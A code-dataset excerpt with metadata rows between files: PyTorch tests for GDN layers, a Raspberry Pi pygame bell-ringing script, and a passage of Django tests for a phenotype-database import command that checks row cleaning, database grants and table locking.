    [([5, 3, 160, 160]), ([3, 6, 64, 64]), ([1, 12, 32, 32])],
)
def test_simplified_gdn(shape):
    """SimplifiedGDN preserves the shape of its input tensor."""
    gen = torch.Generator()
    gen.manual_seed(123)
    # Pass the generator explicitly; it was previously created and seeded but
    # never used, so the random input was not actually deterministic.
    x = torch.randn(shape, generator=gen)

    layer = SimplifiedGDN(x.shape[1])
    output = layer(x)

    assert x.shape == output.shape
@pytest.mark.parametrize(
    "shape",
    [([5, 3, 160, 160]), ([3, 6, 64, 64]), ([1, 12, 32, 32])],
)
def test_simplified_gdn_clamp(shape):
    """SimplifiedGDN clamps gamma/beta during forward without losing parameters."""
    gen = torch.Generator()
    gen.manual_seed(123)
    # Pass the generator explicitly; it was previously created and seeded but
    # never used, so the random input was not actually deterministic.
    x = torch.randn(shape, generator=gen)

    # floating precision error requires this test to be double
    layer = SimplifiedGDN(x.shape[1]).to(torch.double)
    params = layer.parameters()
    # Push both parameters well below their clamp bounds.
    layer.gamma.data = layer.gamma.data - 5
    layer.beta.data = layer.beta.data - 5
    _ = layer(x.to(torch.double))

    # make sure we clamped the params
    assert torch.allclose(layer.gamma.data, torch.zeros_like(layer.gamma.data))
    assert torch.allclose(
        layer.beta.data, torch.ones_like(layer.beta.data) * layer.beta_min
    )
    # make sure we didn't delete parameters
    assert len(list(params)) == 2
@pytest.mark.parametrize(
    "shape",
    [([5, 3, 160, 160]), ([3, 6, 64, 64]), ([1, 12, 32, 32])],
)
def test_simplified_inverse_gdn(shape):
    """SimplifiedInverseGDN preserves the shape of its input tensor."""
    gen = torch.Generator()
    gen.manual_seed(123)
    # Pass the generator explicitly; it was previously created and seeded but
    # never used, so the random input was not actually deterministic.
    x = torch.randn(shape, generator=gen)

    layer = SimplifiedInverseGDN(x.shape[1])
    output = layer(x)

    assert x.shape == output.shape
@pytest.mark.parametrize(
    "shape",
    [([5, 3, 160, 160]), ([3, 6, 64, 64]), ([1, 12, 32, 32])],
)
def test_simplified_inverse_gdn_clamp(shape):
    """SimplifiedInverseGDN clamps gamma/beta during forward without losing parameters."""
    gen = torch.Generator()
    gen.manual_seed(123)
    # Pass the generator explicitly; it was previously created and seeded but
    # never used, so the random input was not actually deterministic.
    x = torch.randn(shape, generator=gen)

    # floating precision error requires this test to be double
    layer = SimplifiedInverseGDN(x.shape[1]).to(torch.double)
    params = layer.parameters()
    # Push both parameters well below their clamp bounds.
    layer.gamma.data = layer.gamma.data - 5
    layer.beta.data = layer.beta.data - 5
    _ = layer(x.to(torch.double))

    # make sure we clamped the params
    assert torch.allclose(layer.gamma.data, torch.zeros_like(layer.gamma.data))
    assert torch.allclose(
        layer.beta.data, torch.ones_like(layer.beta.data) * layer.beta_min
    )
    # make sure we didn't delete parameters
    assert len(list(params)) == 2
| 27.074468
| 79
| 0.656582
| 365
| 2,545
| 4.512329
| 0.232877
| 0.054645
| 0.068002
| 0.063145
| 0.863388
| 0.823315
| 0.823315
| 0.823315
| 0.823315
| 0.823315
| 0
| 0.052088
| 0.200393
| 2,545
| 93
| 80
| 27.365591
| 0.757248
| 0.166601
| 0
| 0.721311
| 0
| 0
| 0.009479
| 0
| 0
| 0
| 0
| 0
| 0.131148
| 1
| 0.065574
| false
| 0
| 0.04918
| 0
| 0.114754
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8f7b91660a2d5e48d2cdbaefa23bd0e0d138c04b
| 4,752
|
py
|
Python
|
play_sound.py
|
dareekun/mybell
|
76bd61d8e7314276f5a5835d8950b13773c89456
|
[
"MIT"
] | null | null | null |
play_sound.py
|
dareekun/mybell
|
76bd61d8e7314276f5a5835d8950b13773c89456
|
[
"MIT"
] | null | null | null |
play_sound.py
|
dareekun/mybell
|
76bd61d8e7314276f5a5835d8950b13773c89456
|
[
"MIT"
] | null | null | null |
# PLAY_sound
# play bell sound
# the pygame library is used as it is more compatible with the raspberry pi's sound output
import pygame
from tkinter import *
import time
def _ring(track, message):
    """Play one bell sound file and block for 10 seconds.

    Arguments:
        track (int): basename of the .ogg file under /home/pi/public/sound/
        message (str): exact text to print when the bell rings; can be used
            for troubleshooting audio problems

    The 10 second sleep prevents the bell from ringing continuously in the
    same minute.
    """
    pygame.init()
    # pygame.init() already initializes the mixer; the explicit call is a
    # harmless no-op when already initialized. The original PLAY_1 called it
    # while PLAY_2..PLAY_15 did not — now all functions behave the same.
    pygame.mixer.init()
    pygame.mixer.music.load("/home/pi/public/sound/{}.ogg".format(track))
    pygame.mixer.music.play()
    print(message)
    time.sleep(10)


# Thin wrappers kept for backward compatibility with existing callers.
# Each preserves the exact log message the original function printed.
def PLAY_1():
    _ring(1, "RINGING!!! PLAY_1")


def PLAY_2():
    _ring(2, "RINGING!!! PLAY_2!!!")


def PLAY_3():
    _ring(3, "RINGING!!! PLAY_3!!!")


def PLAY_4():
    _ring(4, "RINGING!!! PLAY_4!!!")


def PLAY_5():
    _ring(5, "RINGING!!! PLAY_5!!!")


def PLAY_6():
    _ring(6, "RINGING!!! PLAY_6!!!")


def PLAY_7():
    _ring(7, "RINGING!!! PLAY_7!!!")


def PLAY_8():
    _ring(8, "RINGING!!! PLAY_8!!!")


def PLAY_9():
    _ring(9, "RINGING!!! PLAY_9!!!")


def PLAY_10():
    _ring(10, "RINGING!!! PLAY_10!!!")


def PLAY_11():
    _ring(11, "RINGING!!! PLAY_11!!!")


def PLAY_12():
    _ring(12, "RINGING!!! PLAY_12!!!")


def PLAY_13():
    _ring(13, "RINGING!!! PLAY_13!!!")


def PLAY_14():
    _ring(14, "RINGING!!! PLAY_14!!!")


def PLAY_15():
    _ring(15, "RINGING!!! PLAY_15!!!")
| 39.272727
| 97
| 0.694865
| 722
| 4,752
| 4.530471
| 0.083102
| 0.104249
| 0.146744
| 0.096301
| 0.931519
| 0.931519
| 0.931519
| 0.931519
| 0.752675
| 0.740141
| 0
| 0.023889
| 0.180766
| 4,752
| 120
| 98
| 39.6
| 0.816337
| 0.40362
| 0
| 0.478723
| 0
| 0
| 0.255
| 0.146786
| 0
| 0
| 0
| 0
| 0
| 1
| 0.159574
| true
| 0
| 0.031915
| 0
| 0.191489
| 0.159574
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
710575e9bb6e00a53d6fd173d769767580e1864f
| 223,512
|
py
|
Python
|
trait_browser/management/commands/test_import_db.py
|
UW-GAC/pie
|
89ae277f5ba1357580d78c3527f26200686308a6
|
[
"MIT"
] | null | null | null |
trait_browser/management/commands/test_import_db.py
|
UW-GAC/pie
|
89ae277f5ba1357580d78c3527f26200686308a6
|
[
"MIT"
] | 3
|
2020-01-02T20:17:06.000Z
|
2020-01-04T21:13:09.000Z
|
trait_browser/management/commands/test_import_db.py
|
UW-GAC/pie
|
89ae277f5ba1357580d78c3527f26200686308a6
|
[
"MIT"
] | 1
|
2021-10-29T22:15:27.000Z
|
2021-10-29T22:15:27.000Z
|
"""Test the classes and functions in the populate_source_traits management command.
This test module won't run with the usual Django test command, because it's
in an unusual location. Instead, you must specify the path containing this
test module to get these tests to run.
Usage:
./manage.py test trait_browser/management/commands
This test module runs several unit tests and one integration test.
"""
from copy import copy
from datetime import datetime, timedelta
from os.path import exists, join
from os import listdir, stat
from re import compile
from shutil import rmtree
from subprocess import call
from tempfile import mkdtemp
from time import sleep
from unittest import skip
from django.conf import settings
from django.core import management
from django.core.exceptions import ObjectDoesNotExist
from django.test import TestCase, TransactionTestCase
from django.utils import timezone
import watson.search as watson
from core.factories import UserFactory
from tags.factories import TagFactory, TaggedTraitFactory
from tags.models import DCCDecision, DCCReview, StudyResponse, TaggedTrait
from trait_browser.management.commands.import_db import Command, HUNIT_QUERY, STRING_TYPES
from trait_browser.management.commands.db_factory import fake_row_dict
from trait_browser import factories
from trait_browser import models
from trait_browser.test_searches import ClearSearchIndexMixin
# Shared import_db Command instance used by all helpers and tests below.
CMD = Command()
# Remember the configured backup location so tests can restore it after
# redirecting backups to a temp dir (see set_backup_dir/cleanup_backup_dir).
ORIGINAL_BACKUP_DIR = settings.DBBACKUP_STORAGE_OPTIONS['location']
# Directory holding the .sql test fixtures loaded into the devel source db.
TEST_DATA_DIR = 'trait_browser/source_db_test_data'
# Matches dbGaP accession strings like phs000001.v1.pht000001.v1.
DBGAP_RE = compile(r'(?P<dbgap_id>phs\d{6}\.v\d+?\.pht\d{6}\.v\d+?)')
# MySQL queries for inspecting table lock state and listing tables;
# format with db_name before executing.
LOCKED_TABLES_QUERY = 'SHOW OPEN TABLES FROM {db_name} WHERE in_use > 0'
UNLOCKED_TABLES_QUERY = 'SHOW OPEN TABLES FROM {db_name} WHERE in_use = 0'
ALL_TABLES_QUERY = 'SHOW TABLES FROM {db_name}'
def get_devel_db(permissions='readonly'):
    """Get a connection to the devel source db.

    Arguments:
        permissions (str): 'readonly' or 'full'

    Returns:
        connection to the MySQL devel db

    Raises:
        ValueError: if permissions is neither 'readonly' nor 'full'
    """
    if permissions == 'readonly':
        return CMD._get_source_db(which_db='devel')
    elif permissions == 'full':
        return CMD._get_source_db(which_db='devel', admin=True)
    # Previously an unrecognized value fell through and silently returned
    # None, producing a confusing AttributeError at the call site.
    raise ValueError("permissions must be 'readonly' or 'full', got {!r}".format(permissions))
def clean_devel_db():
    """Remove all existing data from the devel source db.

    For each (non-view) table in a 'SHOW TABLES' query, remove all of the
    data in the table with TRUNCATE, with foreign key checks temporarily
    disabled so the tables can be truncated in any order.
    """
    source_db = get_devel_db(permissions='full')
    cursor = source_db.cursor(buffered=True, dictionary=False)
    try:
        db_name = source_db.database.decode('utf-8')
        cursor.execute(ALL_TABLES_QUERY.format(db_name=db_name))
        tables = [el[0].decode('utf-8') for el in cursor.fetchall()]
        # Views cannot be truncated; skip them.
        tables = [el for el in tables if not el.startswith('view_')]
        # Turn off foreign key checks.
        cursor.execute('SET FOREIGN_KEY_CHECKS = 0;')
        # Remove data from each table.
        for t in tables:
            cursor.execute('TRUNCATE {};'.format(t))
        # Turn foreign key checks back on.
        cursor.execute('SET FOREIGN_KEY_CHECKS = 1;')
    finally:
        # Close the cursor and connection even if a query fails; previously
        # an error here leaked the open connection.
        cursor.close()
        source_db.close()
def load_test_source_db_data(filename):
    """Load the data from a specific test data set into the devel source db.

    Arguments:
        filename (str): name of the .sql mysql dump file, found in TEST_DATA_DIR

    Raises:
        ValueError: if the mysql command exits with a non-zero status
    """
    filepath = join(TEST_DATA_DIR, filename)
    mysql_load = ['mysql', '--defaults-file={}'.format(join(settings.SITE_ROOT, settings.CNF_PATH)),
                  '--defaults-group-suffix=_topmed_pheno_devel_admin', '<', filepath]
    # shell=True is required here for the '<' input redirection.
    return_code = call(' '.join(mysql_load), shell=True, cwd=settings.SITE_ROOT)
    # mysql signals failure with any non-zero exit code, not only 1.
    if return_code != 0:
        raise ValueError('MySQL failed to load test data.')
def change_data_in_table(table_name, update_field, new_value, where_field, where_value):
    """Run an UPDATE command in the devel db using arguments about what to change.

    Arguments:
        table_name (str): name of the source db table to UPDATE
        update_field (str): name of the source db field to SET
        new_value (str): new value to set the update_field field to
        where_field (str): field name to use in the WHERE clause of the UPDATE
            command; probably should be the pk field name
        where_value (str): the value of the where_field to set new values for
    """
    source_db = get_devel_db(permissions='full')
    cursor = source_db.cursor(buffered=True)
    try:
        # NOTE: values are interpolated directly into the SQL string. That is
        # acceptable for this trusted test helper, but do not reuse this
        # pattern with untrusted input.
        update_cmd = "UPDATE {} SET {}='{}' WHERE {}={};".format(
            table_name, update_field, new_value, where_field, where_value)
        cursor.execute(update_cmd)
        source_db.commit()
    finally:
        # Close the cursor and connection even if the UPDATE fails; previously
        # an error here leaked the open connection.
        cursor.close()
        source_db.close()
def set_backup_dir():
    """Point the dbbackup storage setting at a fresh temporary directory.

    Returns the new directory path so callers can inspect or remove it.
    """
    new_location = mkdtemp()
    settings.DBBACKUP_STORAGE_OPTIONS['location'] = new_location
    return new_location
def cleanup_backup_dir():
    """Delete the temporary backup dir and restore the original setting."""
    current_location = settings.DBBACKUP_STORAGE_OPTIONS['location']
    rmtree(current_location)
    settings.DBBACKUP_STORAGE_OPTIONS['location'] = ORIGINAL_BACKUP_DIR
# Mixins.
class OpenCloseDBMixin(object):
    """Mixin to add setUp and tearDown methods to TestCases.

    setUp opens a new db connection and tearDown closes the connection.
    The check_* helpers compare data imported into Django models against
    the source db, using the connection opened in setUp.
    """

    def setUp(self):
        """Get a new source db connection for each test."""
        self.source_db = get_devel_db()
        self.cursor = self.source_db.cursor(buffered=True, dictionary=True)

    def tearDown(self):
        """Close the source db connection at the end of each test."""
        self.cursor.close()
        self.source_db.close()

    def check_imported_pks_match(self, pk_names, tables, models):
        """Check that imported primary keys match those from the appropriate source db table.

        pk_names, tables, and models are parallel sequences: the pk column
        name, source table name, and Django model class for each comparison.
        """
        for source_pk, table_name, model in zip(pk_names, tables, models):
            # print(source_pk, table_name, model)
            query = 'SELECT {} FROM {}'.format(source_pk, table_name)
            self.cursor.execute(query)
            # Compare as sorted strings, matching what _get_current_pks returns.
            source_ids = [str(row[source_pk]) for row in self.cursor.fetchall()]
            self.assertEqual(sorted(source_ids), sorted(CMD._get_current_pks(model)))

    def check_imported_values_match(self, make_args_functions, tables, models):
        """Check that values for imported fields match those from the appropriate source db table.

        make_args_functions, tables, and models are parallel sequences; each
        make_args function converts a cleaned source db row into the kwargs
        used to construct the corresponding Django model instance.
        """
        for make_args, table_name, model in zip(make_args_functions, tables, models):
            # print(table_name, model)
            query = 'SELECT * FROM {}'.format(table_name)
            self.cursor.execute(query)
            for row in self.cursor:
                # cursor.description yields (column_name, type_code, ...) tuples.
                field_types = {el[0]: el[1] for el in self.cursor.description}
                model_args = make_args(CMD._fix_row(row, field_types))
                django_obj = model.objects.get(pk=model_args[model._meta.pk.name])
                for field in model_args:
                    self.assertEqual(getattr(django_obj, field), model_args[field], msg='Field: {}'.format(field))

    def check_imported_m2m_relations_match(self, m2m_tables, group_by_fields, concat_fields, parent_models,
                                           m2m_att_names):
        """Check that imported ManyToMany fields match those from the appropriate M2M source db table.

        All five arguments are parallel sequences: link table name, column to
        GROUP BY (used as the parent model's pk below), column whose values
        are concatenated into id_list, parent model class, and the name of
        the M2M attribute on that model.
        """
        for table, group, concat, model, m2m_att in zip(m2m_tables, group_by_fields, concat_fields, parent_models,
                                                        m2m_att_names):
            # One result row per parent object, with a comma-separated list of
            # related ids in the id_list column.
            query = 'SELECT GROUP_CONCAT({}) AS id_list,{} FROM {} GROUP BY {}'.format(concat, group, table, group)
            # print(table, group, concat, model, m2m_att)
            # print(query)
            self.cursor.execute(query)
            for row in self.cursor:
                field_types = {el[0]: el[1] for el in self.cursor.description}
                row = CMD._fix_row(row, field_types)
                source_ids = [int(i) for i in row['id_list'].split(',')]
                django_ids = [obj.pk for obj in getattr(model.objects.get(pk=row[group]), m2m_att).all()]
                self.assertEqual(sorted(source_ids), sorted(django_ids))
# TestCase superclasses (contain no tests).
class BaseTestDataTestCase(OpenCloseDBMixin, TestCase):
    """Superclass to test importing commands on the base.sql test source db data."""

    @classmethod
    def setUpClass(cls):
        """Load the base test data, once for all tests."""
        # Run the TestCase setUpClass method. Py3-style zero-argument super,
        # consistent with GetSourceDbTest in this module.
        super().setUpClass()
        # Clean out the devel db and load the first test dataset.
        # By default, all tests will use dataset 1.
        clean_devel_db()
        load_test_source_db_data('base.sql')
class BaseTestDataReloadingTestCase(OpenCloseDBMixin, TestCase):
    """Superclass to test importing commands on the base.sql test source db data for every test method."""

    def setUp(self):
        """Load the base test data, once for each test method."""
        # Run the OpenCloseDBMixin setUp method. Py3-style zero-argument super,
        # consistent with GetSourceDbTest in this module.
        super().setUp()
        # Clean out the devel db and load the first test dataset.
        # By default, all tests will use dataset 1.
        clean_devel_db()
        load_test_source_db_data('base.sql')
# Tests that don't require test data.
class TestFunctionsTest(TestCase):
    """Tests of the helper functions used by this test script.

    These are integration tests against the live devel source db: each test
    cleans, loads, and inspects real MySQL tables.
    """

    def test_clean_devel_db(self):
        """Test that clean_devel_db() leaves the devel db with 0 rows in each table."""
        # Load real data first so the second clean has something to remove.
        clean_devel_db()
        load_test_source_db_data('base.sql')
        clean_devel_db()
        source_db = get_devel_db(permissions='full')
        cursor = source_db.cursor(buffered=True, dictionary=False)
        db_name = source_db.database.decode('utf-8')
        cursor.execute(ALL_TABLES_QUERY.format(db_name=db_name))
        tables = [el[0].decode('utf-8') for el in cursor.fetchall()]
        # schema_changes is excluded from the zero-row check — presumably it
        # is expected to keep rows after cleaning; confirm against clean_devel_db.
        tables.remove('schema_changes')
        # Views cannot hold their own rows; skip them.
        tables = [el for el in tables if not el.startswith('view_')]
        for tab in tables:
            row_count_query = 'SELECT COUNT(*) FROM {};'.format(tab)
            cursor.execute(row_count_query)
            row_count = cursor.fetchone()[0]
            self.assertEqual(row_count, 0)
        cursor.close()
        source_db.close()

    def test_change_data_in_table(self):
        """change_data_in_table successfully makes a change in the devel source db."""
        clean_devel_db()
        load_test_source_db_data('base.sql')
        table = 'global_study'
        update_field = 'name'
        new_val = 'TEST'
        where_field = 'id'
        where_value = 1
        change_data_in_table(table, update_field, new_val, where_field, where_value)
        # Re-read the row through a fresh connection to verify the UPDATE stuck.
        source_db = get_devel_db()
        cursor = source_db.cursor(buffered=True, dictionary=True)
        cursor.execute('SELECT * FROM {} WHERE {}={};'.format(table, where_field, where_value))
        row = cursor.fetchone()
        field_types = {el[0]: el[1] for el in cursor.description}
        # _fix_row converts bytearrays/NULLs/timezones to comparable values.
        row = CMD._fix_row(row, field_types)
        cursor.close()
        source_db.close()
        self.assertEqual(row[update_field], new_val)
        clean_devel_db()

    def test_load_test_source_db_data(self):
        """Loading the base test data results in non-empty tables where expected."""
        clean_devel_db()
        file_name = 'base.sql'
        load_test_source_db_data(file_name)
        # Tables that base.sql is known to populate.
        non_empty_tables = [
            'allowed_update_reason',
            'component_age_trait',
            'component_batch_trait',
            'component_harmonized_trait_set',
            'component_source_trait',
            'global_study',
            'harmonization_unit',
            'harmonized_function',
            'harmonized_trait',
            'harmonized_trait_encoded_values',
            'harmonized_trait_set',
            'harmonized_trait_set_version',
            'harmonized_trait_set_version_update_reason',
            'schema_changes',
            'source_dataset',
            'source_dataset_data_files',
            'source_dataset_dictionary_files',
            'source_study_version',
            'source_trait',
            'source_trait_encoded_values',
            'source_trait_inconsistent_metadata',
            'study',
            'subcohort',
            'subject',
        ]
        # Tables that base.sql deliberately leaves empty.
        empty_tables = [
            'source_trait_data',
            'harmonized_trait_data',
        ]
        source_db = get_devel_db()
        cursor = source_db.cursor(buffered=True, dictionary=True)
        for table in non_empty_tables:
            cursor.execute('SELECT COUNT(*) FROM {}'.format(table))
            count = cursor.fetchone()
            self.assertTrue(count['COUNT(*)'] > 0,
                            msg='Table {} is unexpectedly empty.'.format(table))
        for table in empty_tables:
            cursor.execute('SELECT COUNT(*) FROM {}'.format(table))
            count = cursor.fetchone()
            self.assertEqual(count['COUNT(*)'], 0,
                             msg='Table {} should be empty, but contains data rows.'.format(table))
        cursor.close()
        source_db.close()
class DbFixersTest(TestCase):
    """Tests of the _fix_[something] methods.

    These are pure unit tests: fake_row_dict() provides a synthetic (row,
    types) pair mimicking what a MySQL cursor returns, and each test checks
    one aspect of the row-cleaning helpers on the Command object.
    """

    def test_fix_bytearray_no_bytearrays_left(self):
        """Bytearrays from the row_dict are converted to strings."""
        row, types = fake_row_dict()
        fixed_row = CMD._fix_bytearray(row)
        for k in fixed_row:
            self.assertNotIsInstance(fixed_row[k], bytearray)

    def test_fix_bytearray_only_bytearrays_altered(self):
        """The non-bytearray values from the row_dict are not altered by _fix_bytearray."""
        row, types = fake_row_dict()
        fixed_row = CMD._fix_bytearray(row)
        # (An unused bytearray_keys list previously computed here was removed.)
        other_keys = [k for k in row.keys() if not isinstance(row[k], bytearray)]
        for k in other_keys:
            self.assertEqual(row[k], fixed_row[k])

    def test_fix_bytearray_to_string(self):
        """The bytearray values from the row_dict are converted to string type."""
        row, types = fake_row_dict()
        fixed_row = CMD._fix_bytearray(row)
        # (An unused other_keys list previously computed here was removed.)
        bytearray_keys = [k for k in row.keys() if isinstance(row[k], bytearray)]
        for k in bytearray_keys:
            self.assertIsInstance(fixed_row[k], str)

    def test_fix_bytearray_empty_bytearray(self):
        """The _fix_bytearray function works on an empty bytearray."""
        row = {'empty_bytearray': bytearray('', 'utf-8')}
        fixed_row = CMD._fix_bytearray(row)
        self.assertEqual(fixed_row['empty_bytearray'], '')

    def test_fix_bytearray_non_utf8(self):
        """_fix_bytearray works on a bytearray with a different encoding that utf-8."""
        row = {'ascii_bytearray': bytearray('foobar', 'ascii')}
        fixed_row = CMD._fix_bytearray(row)
        self.assertEqual(fixed_row['ascii_bytearray'], 'foobar')

    def test_fix_bytearray_empty_dict(self):
        """_fix_bytearray works on an empty dictionary."""
        row = {}
        fixed_row = CMD._fix_bytearray(row)
        self.assertDictEqual(fixed_row, {})

    def test_fix_bytearray_no_bytearrays(self):
        """The row_dict is unchanged when _fix_bytearray is given a dict with no bytearrays in it."""
        row = {'a': 1, 'b': 'foobar', 'c': 1.56, 'd': datetime(2000, 1, 1)}
        fixed_row = CMD._fix_bytearray(row)
        self.assertDictEqual(row, fixed_row)

    def test_fix_null_no_none_left(self):
        """None is completely removed by _fix_null for string types."""
        types = {str(i): i for i in STRING_TYPES}
        row = {str(i): None for i in STRING_TYPES}
        fixed_row = CMD._fix_null(row, types)
        for k in fixed_row:
            self.assertIsNotNone(fixed_row[k])

    def test_fix_null_only_none_altered(self):
        """Only dict values of None are altered."""
        row, types = fake_row_dict()
        fixed_row = CMD._fix_null(row, types)
        # (An unused none_keys list previously computed here was removed.)
        other_keys = [k for k in row.keys() if row[k] is not None]
        for k in other_keys:
            self.assertEqual(row[k], fixed_row[k])

    def test_fix_null_only_string_types_altered(self):
        """Only None values for string type fields are altered."""
        row, types = fake_row_dict()
        fixed_row = CMD._fix_null(row, types)
        none_string_keys = [k for k in row.keys() if row[k] is None and types[k] in STRING_TYPES]
        other_keys = [k for k in row.keys() if k not in none_string_keys]
        for k in other_keys:
            self.assertEqual(row[k], fixed_row[k], msg='Field: {}'.format(k))

    def test_fix_null_string_fields_to_empty_string(self):
        """Dict values of None for each string type field are changed to empty strings."""
        row, types = fake_row_dict()
        fixed_row = CMD._fix_null(row, types)
        # Look up each field's type directly. The previous
        # zip(row.keys(), types) construction compared field *names* (the
        # keys of the types dict) against STRING_TYPES, so the list could
        # never be built as intended. This now mirrors
        # test_fix_null_only_string_types_altered above.
        none_string_keys = [k for k in row.keys() if row[k] is None and types[k] in STRING_TYPES]
        for k in none_string_keys:
            self.assertEqual(fixed_row[k], '')

    def test_fix_null_no_nones(self):
        """A dict containing no Nones is unchanged by _fix_null."""
        row = {'a': 1, 'b': 'foobar', 'c': 1.56, 'd': datetime(2000, 1, 1)}
        # Map each field name to a string type. The previous tuple order
        # (t, field) was reversed, producing a {type: field} mapping instead
        # of the intended {field: type}.
        types = {field: t for (field, t) in zip(row, STRING_TYPES)}
        fixed_row = CMD._fix_null(row, types)
        self.assertDictEqual(row, fixed_row)

    def test_fix_null_empty_dict(self):
        """An empty dict is unchanged by _fix_null."""
        row = {}
        types = {}
        fixed_row = CMD._fix_null(row, types)
        self.assertDictEqual(row, fixed_row)

    def test_fix_null_date_stays_none(self):
        """Dict values of datetime and timestamp type are left as None."""
        row, types = fake_row_dict()
        row['datetime'] = None
        row['timestamp'] = None
        fixed_row = CMD._fix_null(row, types)
        self.assertIsNone(fixed_row['datetime'])
        self.assertIsNone(fixed_row['timestamp'])

    def test_fix_null_boolean_stays_none(self):
        """Dict values of boolean (tiny int) type are left as None."""
        row, types = fake_row_dict()
        row['boolean'] = None
        fixed_row = CMD._fix_null(row, types)
        self.assertIsNone(fixed_row['boolean'])

    def test_fix_timezone_result_is_aware(self):
        """The resulting datetimes from _fix_timezone are in fact timezone aware."""
        row, types = fake_row_dict()
        fixed_row = CMD._fix_timezone(row)
        for k in row:
            if isinstance(row[k], datetime):
                # Standard "aware datetime" check: tzinfo set and utcoffset defined.
                self.assertTrue(
                    fixed_row[k].tzinfo is not None and fixed_row[k].tzinfo.utcoffset(fixed_row[k]) is not None)

    def test_fix_timezone_only_datetimes_altered(self):
        """Non-datetime objects in the dict are not altered by _fix_timezone."""
        row, types = fake_row_dict()
        fixed_row = CMD._fix_timezone(row)
        for k in row:
            if not isinstance(row[k], datetime):
                self.assertEqual(row[k], fixed_row[k])

    def test_fix_timezone_still_datetime(self):
        """Datetime objects in the dict are still of datetime type after conversion by _fix_timezone."""
        row, types = fake_row_dict()
        fixed_row = CMD._fix_timezone(row)
        for k in row:
            if isinstance(row[k], datetime):
                self.assertTrue(isinstance(fixed_row[k], datetime))

    def test_fix_timezone_empty_dict(self):
        """_fix_timezone works properly on (doesn't alter) an empty dictionary input."""
        row = {}
        fixed_row = CMD._fix_timezone(row)
        self.assertDictEqual(fixed_row, row)

    def test_fix_timezone_no_datetimes(self):
        """A dict containing no datetime objects is unaltered by _fix_timezone."""
        row = {'a': 1, 'b': 'foobar', 'c': 1.56, 'd': None, 'e': bytearray('foobar', 'utf-8')}
        fixed_row = CMD._fix_timezone(row)
        self.assertDictEqual(fixed_row, row)
class GetSourceDbTest(TestCase):
    """Tests of the _get_source_db() utility function."""

    @classmethod
    def setUpClass(cls):
        super().setUpClass()
        # Expected connection parameters shared by several tests below.
        cls.expected_privileges = 'SELECT, LOCK TABLES'
        cls.expected_user = 'pie'
        cls.expected_devel_db = r'topmed_pheno_devel_.+'
        cls.expected_production_db = 'topmed_pheno'

    def _get_non_usage_grant(self, db):
        """Return the first non-USAGE grant string for the given connection."""
        cursor = db.cursor()
        cursor.execute('SHOW GRANTS')
        grants = [el[0].decode('utf-8') for el in cursor.fetchall()]
        return [el for el in grants if 'USAGE' not in el][0]

    def _assert_grants(self, db, privileges, db_pattern, user_pattern):
        """Assert that the connection's grant matches the privileges, db, and user patterns."""
        self.assertRegex(
            self._get_non_usage_grant(db),
            r"GRANT {priv} ON `{db}`\.\* TO '{user}'".format(priv=privileges, db=db_pattern, user=user_pattern))

    def test_returns_correct_devel_db(self):
        """Connects to a db that matches the expected db name pattern."""
        db = CMD._get_source_db(which_db='devel')
        db_name = db.database.decode('utf-8')
        db.close()
        self.assertRegex(db_name, self.expected_devel_db)

    def test_returns_correct_production_db(self):
        """Connects to a db that matches the expected production db name."""
        db = CMD._get_source_db(which_db='production')
        db_name = db.database.decode('utf-8')
        db.close()
        self.assertEqual(db_name, self.expected_production_db)

    def test_timezone_is_utc(self):
        """The timezone of the source_db MySQL connection is UTC."""
        db = CMD._get_source_db(which_db='devel')
        db_timezone = db.time_zone.decode('utf-8')
        db.close()
        self.assertEqual('+00:00', db_timezone)

    def test_devel_expected_privileges_and_user(self):
        """Connects with expected privileges and user on the devel db."""
        db = CMD._get_source_db(which_db='devel')
        self._assert_grants(db, self.expected_privileges, self.expected_devel_db, self.expected_user)
        db.close()

    def test_production_expected_privileges_and_user(self):
        """Connects with expected privileges and user on the production db."""
        # Docstring fixed: this test checks the production db, not devel.
        db = CMD._get_source_db(which_db='production')
        self._assert_grants(db, self.expected_privileges, self.expected_production_db, self.expected_user)
        db.close()

    def test_production_admin_error(self):
        """Raises error when trying to connect to production as admin."""
        with self.assertRaises(ValueError):
            db = CMD._get_source_db(which_db='production', admin=True)
            db.close()

    def test_devel_expected_privileges_and_user_admin(self):
        """Connects with expected privileges and user on the devel db with admin argument."""
        expected_admin_user = r'admin_topmed_pheno_devel_.+'
        expected_admin_privileges = r'ALL PRIVILEGES'
        db = CMD._get_source_db(which_db='devel', admin=True)
        self._assert_grants(db, expected_admin_privileges, self.expected_devel_db, expected_admin_user)
        db.close()
class LockSourceDbTest(TestCase):
    """Tests of the functions to lock the source db."""

    def _query_tables(self, cursor, query, db_name, column, exclude_views=False):
        """Run a table-listing query and return the sorted table names.

        exclude_views filters out 'view_'-prefixed names; the locked-table
        queries are intentionally left unfiltered, matching what the lock
        function is expected to produce.
        """
        cursor.execute(query.format(db_name=db_name))
        tables = [row[column].decode('utf-8') for row in cursor]
        if exclude_views:
            tables = [el for el in tables if not el.startswith('view_')]
        return sorted(tables)

    def test_locks_all_tables_devel(self):
        """Locks all non-view tables in devel db."""
        db = CMD._get_source_db(which_db='devel')
        db_name = db.database.decode('utf-8')
        CMD._lock_source_db(db)
        cursor = db.cursor(dictionary=True)
        locked_tables = self._query_tables(cursor, LOCKED_TABLES_QUERY, db_name, 'Table')
        all_tables = self._query_tables(
            cursor, ALL_TABLES_QUERY, db_name, 'Tables_in_' + db_name, exclude_views=True)
        self.assertListEqual(all_tables, locked_tables)
        db.close()  # Testing confirms that closing the db connection removes the locks.

    def test_closing_db_leaves_no_locked_tables(self):
        """Leaves the tables unlocked in devel db after the db is closed."""
        db = CMD._get_source_db(which_db='devel')
        db_name = db.database.decode('utf-8')
        cursor = db.cursor(dictionary=True)
        all_tables = self._query_tables(
            cursor, ALL_TABLES_QUERY, db_name, 'Tables_in_' + db_name, exclude_views=True)
        CMD._lock_source_db(db)
        locked_tables = self._query_tables(cursor, LOCKED_TABLES_QUERY, db_name, 'Table')
        self.assertListEqual(all_tables, locked_tables)
